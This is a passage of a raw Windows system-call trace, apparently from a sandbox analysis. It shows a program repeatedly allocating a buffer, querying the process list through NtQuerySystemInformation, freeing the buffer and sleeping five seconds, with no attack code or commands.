BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.295] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.305] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.319] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.333] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.336] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.352] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.367] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.368] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.382] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.399] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.414] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.436] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.446] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.462] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.473] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.475] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.493] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.509] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.523] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.541] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.554] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.570] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.585] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.600] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.601] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 